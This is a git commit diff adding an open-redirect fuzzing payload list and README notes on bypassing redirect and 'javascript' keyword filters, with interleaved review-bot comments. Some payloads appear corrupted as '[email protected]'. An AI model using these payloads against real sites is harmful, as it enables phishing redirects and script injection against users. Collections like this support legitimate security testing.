Open Redirect Payloads updated
Swissky committed Jul 6, 2017
1 parent 6070ece commit c4b49fa
Showing 2 changed files with 248 additions and 4 deletions.
235 changes: 235 additions & 0 deletions Open redirect/Open-Redirect-payloads.txt
@@ -0,0 +1,235 @@
//google.com/%2f..
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
//www.google.com/%2f%2e%2e
//[email protected]/%2f%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
//google.com/
//[email protected]/
///google.com/
///[email protected]/
////google.com/
////[email protected]/
https://google.com/
https://[email protected]/
/https://google.com/
/https://[email protected]/
//google.com//
//[email protected]//
///google.com//
///[email protected]//
////google.com//
////[email protected]//
https://google.com//
https://[email protected]//
//https://google.com//
//https://[email protected]//
//www.google.com/%2e%2e%2f
//[email protected]/%2e%2e%2f
///www.google.com/%2e%2e%2f
///[email protected]/%2e%2e%2f
////www.google.com/%2e%2e%2f
////[email protected]/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://[email protected]/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://[email protected]/%2e%2e%2f
///www.google.com/%2e%2e
///[email protected]/%2e%2e
////www.google.com/%2e%2e
////[email protected]/%2e%2e
https:///www.google.com/%2e%2e
https:///[email protected]/%2e%2e
//https:///www.google.com/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://[email protected]/%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///[email protected]/%2f%2e%2e
/%09/google.com
/%09/[email protected]
//%09/google.com
//%09/[email protected]
///%09/google.com
///%09/[email protected]
////%09/google.com
////%09/[email protected]
https://%09/google.com
https://%09/[email protected]
/%5cgoogle.com
/%[email protected]
//%5cgoogle.com
//%[email protected]
///%5cgoogle.com
///%[email protected]
////%5cgoogle.com
////%[email protected]
https://%5cgoogle.com
https://%[email protected]
/https://%5cgoogle.com
/https://%[email protected]
https://google.com
https://[email protected]
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0330.072.0326.0316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.00072.0000326.00000316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd8.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.0x3a.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http:0xd8.0x3a.0xd6.0xce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0330.072.0326.0316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.00072.0000326.00000316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd8.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.0x3a.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:[email protected]/
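Review bot: the target half of every entry is hard-coded to google.com or to 216.58.214.206 in its hex (`0xd8.0x3a.0xd6.0xce`, `0xd83ad6ce`), decimal (`3627734734`), octal (`0330.072.0326.0316`), mixed (`0xd8.072.54990`, `0xd8.3856078`) and IPv6-mapped (`[::ffff:216.58.214.206]`) spellings, while only the whitelisted half uses a placeholder; a second placeholder for the attacker host would let the README's sed rewrite both ends, and a one-line comment that all of these integer forms decode to the same address (216*2^24 + 58*2^16 + 214*2^8 + 206 = 3627734734) would save readers re-deriving it. `472.314.470.462` is the per-octet-plus-256 overflow form that only some parsers accept, so a miss on that line is not a negative result. Several entries render here as `[email protected]`; confirm the raw file carries the literal `www.whitelisteddomain.tld@<host>` form as on `//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e` and `http://www.whitelisteddomain.tld@0xd83ad6ce`, since the README's sed keys on that literal string. `ーgoogle.com` and `/ーgoogle.com` each appear twice; if the two differ only in code point (e.g. U+30FC versus the halfwidth U+FF70), note that, otherwise one of each pair is a duplicate.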
17 changes: 13 additions & 4 deletions Open redirect/README.md
@@ -1,7 +1,15 @@
# Open URL Redirection
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

## Exploits
## Fuzzing
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case

To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
```
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```

## Exploitation

Using CRLF to bypass "javascript" blacklisted keyword
```
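Review bot: the sed in the Fuzzing block has no `g` flag and leaves the dots of `www.whitelisteddomain.tld` as regex metacharacters, and an unescaped `/` or `&` in `$WHITELISTEDDOMAIN` would break the replacement; `sed 's/www\.whitelisteddomain\.tld/'"$WHITELISTEDDOMAIN"'/g'` fixes the first two and is enough as long as the value is a bare hostname. The trailing awk re-appends the last label (`www.test.com` becomes `https://www.test.com.com`); a sentence saying this is the prefix-match bypass, for a check that only tests whether the URL starts with `https://www.test.com`, would make the generated line self-explanatory. The description paragraph is shown as removed and re-added with no visible difference, so that part of the hunk appears to be whitespace only and adds noise to the diff.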
@@ -21,7 +29,7 @@ https:google.com
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
```
\/\/google.com/
/\/google.com/
/\/google.com/
```


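Review bot: `Browsers see \/\/ as //` would be stronger with the mechanism: the WHATWG URL parser treats a backslash as a forward slash for special schemes such as http and https, so `\/\/google.com/` in a Location header lands on google.com while a server-side filter that only blacklists the literal `//` lets it through; worth adding that non-browser HTTP clients generally do not apply this rewrite, so the bypass is client-specific. `/\/google.com/` is shown as both removed and added with no visible difference, so that line looks like a whitespace-only change.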
@@ -66,4 +74,5 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)

## Thanks to
* filedescriptor
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
